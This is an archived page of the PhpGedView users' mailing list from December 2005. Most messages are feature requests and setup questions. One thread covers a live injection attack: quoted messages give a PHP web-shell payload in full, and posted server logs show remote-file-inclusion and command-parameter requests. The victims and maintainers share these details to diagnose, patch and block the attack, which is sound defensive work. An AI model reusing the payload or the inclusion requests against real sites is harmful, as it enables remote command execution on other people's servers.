phpgedview-talk Mailing List for PhpGedView (Page 21)
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
phpgedview-talk — For installation, help, bugs, and suggestions for phpgedview
You can subscribe to this list here.
| 2003 |
Jan
|
Feb
|
Mar
(1) |
Apr
|
May
(1) |
Jun
|
Jul
(2) |
Aug
(1) |
Sep
|
Oct
(1) |
Nov
(1) |
Dec
(5) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2004 |
Jan
(4) |
Feb
(3) |
Mar
(35) |
Apr
(37) |
May
(22) |
Jun
|
Jul
(2) |
Aug
(7) |
Sep
(10) |
Oct
(9) |
Nov
|
Dec
(16) |
| 2005 |
Jan
(16) |
Feb
(4) |
Mar
(48) |
Apr
(12) |
May
(4) |
Jun
(3) |
Jul
(4) |
Aug
(19) |
Sep
(31) |
Oct
(16) |
Nov
(7) |
Dec
(58) |
| 2006 |
Jan
(9) |
Feb
(14) |
Mar
(16) |
Apr
(12) |
May
(9) |
Jun
(9) |
Jul
(31) |
Aug
(19) |
Sep
(3) |
Oct
|
Nov
(11) |
Dec
(3) |
| 2007 |
Jan
(16) |
Feb
(1) |
Mar
(4) |
Apr
(17) |
May
(40) |
Jun
(14) |
Jul
(31) |
Aug
(10) |
Sep
(14) |
Oct
(64) |
Nov
(24) |
Dec
(13) |
| 2008 |
Jan
(12) |
Feb
(2) |
Mar
(7) |
Apr
(2) |
May
(16) |
Jun
(8) |
Jul
(4) |
Aug
(14) |
Sep
(13) |
Oct
(2) |
Nov
|
Dec
|
| 2009 |
Jan
(1) |
Feb
(11) |
Mar
(5) |
Apr
(6) |
May
|
Jun
(1) |
Jul
|
Aug
(1) |
Sep
(1) |
Oct
|
Nov
(2) |
Dec
|
| 2010 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(1) |
Nov
|
Dec
|
| 2011 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
(3) |
Dec
|
| 2016 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(1) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2017 |
Jan
(1) |
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
(1) |
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
(2) |
Nov
|
Dec
|
| 2022 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
(1) |
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: S.C. G. <alp...@gm...> - 2005-12-25 22:50:51
|
My server has been getting hit hard. Much of their attenmpts seem random, they try for subdirectories to applications I don't even have. Such as the follow subdirs, mambo, drupal, blog, xmlrpc, phpgroupware, awstats etc... mainly they are looking for " xmlrpc.php" The most brutal attacks come from 222.90.66.197 sys-206.196.101.28.primary.net 62.206.128.46 host.osmnetworks.net mail.ctbullet.org You may see my analog reports for yourself http://vinland.ath.cx/analog , and if you'd like to see my http error logs. I will post those as well. p.s. I run an AlphaServer 1200 with FreeBSD. The only public reference to m= y server is my family tree listed on the phpgedview.net site. My server has been up for 5 days, and has been getting attacked non stop since i posted m= y site on phpgedview.net phpgedview should so soemthing about the hackers using their list. --- ---S.C. Gehl, 'Beauty to Burn' |
|
From: Johan B. <mai...@go...> - 2005-12-25 10:25:26
|
Hi Folks, An another attempt here at http://barelds.good-it.com. See below a piece from my webserver logs: --------------------- 81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!" 87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Sgrunt| V109|1012|S214027450|dialno; snprtz|dialno)" --------------------- The URL mentioned in the log is still there and available. Perhaps someone should notify the ISP? Grz. Johan Op dinsdag 20 december 2005 20:31, schreef Matthew Gates: > Hi all, > > I had a curious user request on my phpGedView site. Looks like they're > attempting some PHP injection style attack, using PHP code in the email > address and other field in the user table, like this: > > \';error_reporting(0);if(isset($suntzu)) > {system($_GET[suntzu]);die(\'HiMaster!\');}echo\' > > From my log files it looks like the attacker was trying to download a linux > binary and a PHP script using wget. I grabbed the target files and can > provide a sample if anyone is interested in trying to un-pick what they do > (know a good linux dis-assembler?). > > Doesn't look like they managed to do anything nasty, probably because wget > isn't available on my server. Just a heads up for everyone to keep an eye > out. Grep your logs for wget. > > I reported the incident to SANS and they said they have seen it and sent me > this link, which looks like a published version of the exploit: > > http://www.milw0rm.com/id.php?id=1379 > > ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 > final, so I think I would have been infected if I had had wget installed. > Watch yourselves! > > I'm guessing we need a patch of some sort. > > Regards, -- Kind Regards / Met vriendelijke groet, Johan Barelds Good-IT! Tel.+31(0)70-3296957 Martinus Nijhoffweg 42 Mob.+31(0)6-54253750 2548 EP Den Haag j.b...@go... http://www.good-it.com |
|
From: Dick K. <di...@ka...> - 2005-12-24 22:05:57
|
Joe, It created a new username so I bet t is an attack. I guess blocking does not help very much because I see so much ip numbers that this guy can have very much different ip numbers and / or pc's available for him/her Dick -----Oorspronkelijk bericht----- Van: php...@li... [mailto:php...@li...]Namens Joe Tellup Verzonden: zaterdag 24 december 2005 18:46 Aan: php...@li... Onderwerp: RE: [Phpgedview-talk] Patch to possible security threat Ok, are you sure it's an attack, if so we need to block that ip too Sincerely Joseph Tellup Regional Chairman, Region Five Central Committee Butler County Republican Party http://www.tellup.org <http://www.tellup.org/> 614-883-1734 > -----Original Message----- > From: php...@li... > [mailto:php...@li...]On Behalf Of Dick > Kaas > Sent: Saturday, December 24, 2005 9:29 AM > To: php...@li... > Subject: RE: [Phpgedview-talk] Patch to possible security threat > > > And here is another site attacking my PhpGedwiew > > IP ADDRESS: 80.74.132.220 > DNS LOOKUP: ns1.swisseasy.net > > Dick > ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
|
From: Joe T. <jo...@te...> - 2005-12-24 17:46:14
|
Ok, are you sure it's an attack, if so we need to block that ip too Sincerely Joseph Tellup Regional Chairman, Region Five Central Committee Butler County Republican Party http://www.tellup.org <http://www.tellup.org/> 614-883-1734 > -----Original Message----- > From: php...@li... > [mailto:php...@li...]On Behalf Of Dick > Kaas > Sent: Saturday, December 24, 2005 9:29 AM > To: php...@li... > Subject: RE: [Phpgedview-talk] Patch to possible security threat > > > And here is another site attacking my PhpGedwiew > > IP ADDRESS: 80.74.132.220 > DNS LOOKUP: ns1.swisseasy.net > > Dick > |
|
From: Dick K. <di...@ka...> - 2005-12-24 14:28:48
|
And here is another site attacking my PhpGedwiew IP ADDRESS: 80.74.132.220 DNS LOOKUP: ns1.swisseasy.net Dick -----Oorspronkelijk bericht----- Van: php...@li... [mailto:php...@li...]Namens Keith Conley Verzonden: dinsdag 20 december 2005 23:01 Aan: php...@li... Onderwerp: Re: [Phpgedview-talk] Patch to possible security threat John Finlay wrote: > > > > You should also block access to your site from the following IP addresses: > > 67.19.24.66 > > 62.42.112.10 > > > > --John > > John Finlay > > PhpGedView Project Manager > You should also add to the deny list: IP ADDRESS: 65.118.243.76 DNS LOOKUP: curlyjoe.sd.stargateinc.net This is the address hitting my server. Keith Conley ------------------------------------------------------- This SF.net email is sponsored by: Splunk Inc. Do you grep through log files for problems? Stop! Download the new AJAX search engine that makes searching your log files as easy as surfing the web. DOWNLOAD SPLUNK! http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click _______________________________________________ Phpgedview-talk mailing list Php...@li... https://lists.sourceforge.net/lists/listinfo/phpgedview-talk |
|
From: John F. <Joh...@ne...> - 2005-12-23 15:56:00
|
You don't need to patch the 4.0 beta 3 files. The files included in the beta 3 release already include the security patches. Sorry for the confusion. Try copying the login_register.php file you download from the beta 3 zip file back up to your site. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Thursday, December 22, 2005 8:15 PM To: php...@li... Subject: [Phpgedview-talk] 4.0 beta3, patched. New account errors. =20 Hello... Requesting a new account cases this error.. ERROR 8: Undefined index: pls_note03 0 Error occurred on in function unknown 1 called from line 259 of file login_register.php Notice: Undefined index: pls_note03 in /www/html/phpGedView/login_register.php on line 259 --- Please see my site for a better example, http://vinland.ath.cx --=20 ---S.C. Gehl, 'Beauty to Burn'=20 |
|
From: S.C. G. <alp...@gm...> - 2005-12-23 03:15:33
|
Hello... Requesting a new account cases this error.. ERROR 8: Undefined index: pls_note03 0 Error occurred on in function *unknown* 1 called from line *259* of file *login_register.php* *Notice*: Undefined index: pls_note03 in * /www/html/phpGedView/login_register.php* on line *259* --- Please see my site for a better example, http://vinland.ath.cx -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: John F. <Joh...@ne...> - 2005-12-22 22:54:14
|
I haven't actually used the feature myself. I imagine that you have to create a cvs repository with your gedcom in it and then check it out. You should post the question on the patch forum to get a more conclusive answer. The creator of the patch will respond and then we will all have the instructions. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Thursday, December 22, 2005 3:06 PM To: php...@li... Subject: Re: [Phpgedview-talk] CVS feature in 4.0 beta3 =20 What do I need to do to get it going? I have the CVS switch turned on, and CVS is a part of the FreeBSD system. On 12/22/05, John Finlay < Joh...@ne... <mailto:Joh...@ne...> > wrote: See this patch for more information about this feature: https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1378524&gro= up_ id=3D55456&atid=3D477081 =20 It basically allows you to check your GEDCOM and config files into CVS or Subversion every time they are changed. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Thursday, December 22, 2005 12:50 PM To: php...@li... Subject: [Phpgedview-talk] CVS feature in 4.0 beta3 =20 What exactly does the cvs switch do? I haven't noticed any versioning with anything on my system. --=20 ---S.C. Gehl, 'Beauty to Burn'=20 --=20 ---S.C. Gehl, 'Beauty to Burn'=20 |
|
From: S.C. G. <alp...@gm...> - 2005-12-22 22:05:52
|
What do I need to do to get it going? I have the CVS switch turned on, and CVS is a part of the FreeBSD system. On 12/22/05, John Finlay <Joh...@ne...> wrote: > > See this patch for more information about this feature: > > > https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1378524&gro= up_id=3D55456&atid=3D477081 > > > > It basically allows you to check your GEDCOM and config files into CVS or > Subversion every time they are changed. > > > > --John > > > ------------------------------ > > *From:* php...@li... [mailto: > php...@li...] *On Behalf Of *S.C. Gehl > *Sent:* Thursday, December 22, 2005 12:50 PM > *To:* php...@li... > *Subject:* [Phpgedview-talk] CVS feature in 4.0 beta3 > > > > What exactly does the cvs switch do? > > I haven't noticed any versioning with anything on my system. > > -- > ---S.C. Gehl, 'Beauty to Burn' > -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: John F. <Joh...@ne...> - 2005-12-22 20:18:21
|
See this patch for more information about this feature: https://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D1378524&gro= up_ id=3D55456&atid=3D477081 =20 It basically allows you to check your GEDCOM and config files into CVS or Subversion every time they are changed. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Thursday, December 22, 2005 12:50 PM To: php...@li... Subject: [Phpgedview-talk] CVS feature in 4.0 beta3 =20 What exactly does the cvs switch do? I haven't noticed any versioning with anything on my system. --=20 ---S.C. Gehl, 'Beauty to Burn'=20 |
|
From: S.C. G. <alp...@gm...> - 2005-12-22 19:50:06
|
What exactly does the cvs switch do? I haven't noticed any versioning with anything on my system. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: <den...@ur...> - 2005-12-22 14:31:58
|
Yes it would be nice to see this in the program, but here is what I do. http://terraserver.microsoft.com has free topo & aerial maps, so if you know the area you can zoom in on the topo map & find out where it is. http://www.esg.montana.edu/gl/trs-data.html has a program that will convert a land description into longitude & latitude for the western states (the tough part is knowing the meridian). As far as the separate listing for locations, I use the historic location & in the event notes I put in the current location. I hope that helps Dennis At 09:21 PM 12/21/2005, you wrote: >Another feature wish that I have just thought of while searching for a few >princedoms in germany.... > >2 seperate listings for locations. > >One for the name of the location when the event occured. birth, death, etc >Another for the current name of the location. > >It's a recurring thing in my research that I will be looking for info on a >town, and it will turn out that it no longer exists or that it has been >absorbed into another town. > >I also would like to see a section for land grants. > >I have family in Minnesota that founded towns in "Section 22" .. it would b= >e >nice to somehow clarify where and what Section 22 is. |
|
From: S.C. G. <alp...@gm...> - 2005-12-21 19:37:32
|
Another feature wish that I have just thought of while searching for a few princedoms in germany.... 2 seperate listings for locations. One for the name of the location when the event occured. birth, death, etc Another for the current name of the location. It's a recurring thing in my research that I will be looking for info on a town, and it will turn out that it no longer exists or that it has been absorbed into another town. I also would like to see a section for land grants. I have family in Minnesota that founded towns in "Section 22" .. it would b= e nice to somehow clarify where and what Section 22 is. On 12/21/05, S.C. Gehl <alp...@gm...> wrote: > > How can I add adopted children to a family with unknown biological > parents. > > I'd like to have them 'associated' to the family as opposed to being a > part of the family. > > --- > > Also, under marriages, I'd like to have a section for the address of the > location, a list of witnessess, the best man, the priest or judge, guests= . > All linkable to individual IDs. > > For death/burial, i'd like to have a pall bearer list, cemetery location > with a section for plot location. If creamation, location of the ashes es= p. > if dispersed. If burial at sea, name of the ship, and ocean. If the perso= n > was a veteran, a section for names of VFW posts who gave military service= s > over the funeral such as gun salutes. > > For military service, a section for rank, awards, locations served in, > names of ships or planes they that served in, divisions assigned to, > theatres, missions, mission details etc. > > I'd also like to see a section for travels, ... names of locations dates > visited etc. > > Even a section for hobbies. > > -- > ---S.C. Gehl, 'Beauty to Burn' -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: Tastiger <tas...@sc...> - 2005-12-21 18:32:06
|
There are certainly some things that could should be looked at in future versions this example reminds me so much of my issue - have you tried adding a step child? Something that is no doubt very much prevalent in today's society - but best I can do is get a half sister or brother, which genetically speaking they are not but are they part of the family tree? - I think so. Any ideas on why this has been overlooked? At 04:06 22/12/2005, you wrote: >How can I add adopted children to a family with unknown biological parents. > >I'd like to have them 'associated' to the family as opposed to being >a part of the family. |
|
From: S.C. G. <alp...@gm...> - 2005-12-21 17:06:11
|
How can I add adopted children to a family with unknown biological parents. I'd like to have them 'associated' to the family as opposed to being a part of the family. --- Also, under marriages, I'd like to have a section for the address of the location, a list of witnessess, the best man, the priest or judge, guests. All linkable to individual IDs. For death/burial, i'd like to have a pall bearer list, cemetery location with a section for plot location. If creamation, location of the ashes esp. if dispersed. If burial at sea, name of the ship, and ocean. If the person was a veteran, a section for names of VFW posts who gave military services over the funeral such as gun salutes. For military service, a section for rank, awards, locations served in, name= s of ships or planes they that served in, divisions assigned to, theatres, missions, mission details etc. I'd also like to see a section for travels, ... names of locations dates visited etc. Even a section for hobbies. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: Tastiger <tas...@sc...> - 2005-12-21 00:39:39
|
Well - deleting isn't the answer - he's back again :-( There has to be a file or script running somewhere that keeps auto subscribing - just wish I knew where..... |
|
From: Keith C. <ke...@dr...> - 2005-12-20 23:32:42
|
I just wanted to also say thank you for the lightning fast response to this threat. This is another fine example of how Open Source projects can rise above and beyond the rest. Keith Conley |
|
From: Rodney H. <rm...@rm...> - 2005-12-20 23:30:25
|
Further to my last, now when I log into my Welcome page, I am denied editing and when I log out of my Welcome page, I get at the top of the page:- Notice: Undefined index: fullname in /home/domain/domain60/web/tree2/includes/authentication_index.php on line 300 Unable to write to ./index/authenticate.php Notice: Undefined index: download_here in /home/domain/domain60/web/tree2/includes/authentication_index.php on line 322 Warning: Cannot modify header information - headers already sent by (output started at /home/domain/domain60/web/tree2/includes/authentication_index.php:300) in /home/domain/domain60/web/tree2/includes/functions_print.php on line 562 _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 23:02 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: Tastiger <tas...@sc...> - 2005-12-20 23:18:45
|
At 08:44 21/12/2005, you wrote: >You should also delete any 'suntzu' users that happen to be created in >your pgv_users table. It's no use just deleting them via the Admin panel they just keep coming back |
|
From: Rodney H. <rm...@rm...> - 2005-12-20 23:16:02
|
Sorry John, Just fixed it by deleting all the Index folder and restoring from my backup, just done last night, as it happens. There was a lot of guff in the authenticate.php with suntzu intermixed, but I don't have it now. I have applied the two patches you published and blocked 3 URLs in my .htaccess. Regards -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 23:02 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: John F. <Joh...@ne...> - 2005-12-20 23:03:41
|
If you are using index files you will need to manually edit the index/authenticate.php file and remove the user entry that was just added. It should be the last entry in the list. Before you make this change can your forward your authenticate.php file to me at john.finlay at neumont.edu. It will help me try to figure out what he is trying to do by creating these users. So far I haven't seen any problem other than annoyance on mysql sites, but it could cause more problems on a site running index mode. =20 --John =20 =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of Rodney Hall Sent: Tuesday, December 20, 2005 3:57 PM To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt =20 I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: =20 Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 =20 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ =20 =20 =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. =20 --John =20 ________________________________ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt =20 When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. --=20 ---S.C. Gehl, 'Beauty to Burn'=20 |
|
From: Rodney H. <rm...@rm...> - 2005-12-20 22:57:02
|
I have been hit by this attack and uploaded the patch files. However, when I try to log onto my site all I get is: Parse error: parse error, unexpected T_STRING in /home/domain/domain60/web/tree2/index/authenticate.php on line 370 How can I cure this please? Replacing the file from disk does not work. v3.4 -- Rodney HALL Heywood, Lancashire Suaviter sed fortiter Agreeably but powerfully ~~~~~~~~~~~~~~ rm...@rm... http://rmhh.co.uk/ http://rmhh.org.uk/ ~~~~~~~~~~~~~~~ _____ From: php...@li... [mailto:php...@li...] On Behalf Of John Finlay Sent: 20 December 2005 22:35 To: php...@li... Subject: RE: [Phpgedview-talk] attack attempt You will need to manually delete the suntzu user from the pgv_users table. --John _____ From: php...@li... [mailto:php...@li...] On Behalf Of S.C. Gehl Sent: Tuesday, December 20, 2005 3:33 PM To: php...@li... Subject: Re: [Phpgedview-talk] attack attempt When I went to goto user admin and delete him, i got this error; ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 ERROR 8: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy 0 Error occurred on in function unknown 1 called from line 713 of file useradmin.php Notice: Undefined index: lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in /www/html/phpGedView/useradmin.php on line 713 I run my own server via dynamic DNS... I closed my firewall in time i hope, I'll let you know. -- ---S.C. Gehl, 'Beauty to Burn' |
|
From: John F. <Joh...@ne...> - 2005-12-20 22:36:34
|
You will need to manually delete the suntzu user from the pgv_users
table.
=20
--John
=20
________________________________
From: php...@li...
[mailto:php...@li...] On Behalf Of S.C.
Gehl
Sent: Tuesday, December 20, 2005 3:33 PM
To: php...@li...
Subject: Re: [Phpgedview-talk] attack attempt
=20
When I went to goto user admin and delete him, i got this error;
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function unknown
1 called from line 713 of file useradmin.php
Notice: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in
/www/html/phpGedView/useradmin.php on line 713
I run my own server via dynamic DNS... I closed my firewall in time i
hope, I'll let you know.
--=20
---S.C. Gehl, 'Beauty to Burn'=20
|
|
From: S.C. G. <alp...@gm...> - 2005-12-20 22:33:04
|
When I went to goto user admin and delete him, i got this error;
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index: english\';error_reporting(0);if(isset($suntzu)){s=
y
0 Error occurred on in function *unknown*
1 called from line *713* of file *useradmin.php*
*Notice*: Undefined index:
english\';error_reporting(0);if(isset($suntzu)){sy in *
/www/html/phpGedView/useradmin.php* on line *713*
ERROR 8: Undefined index:
lang_name_english\';error_reporting(0);if(isset($suntzu)){sy
0 Error occurred on in function *unknown*
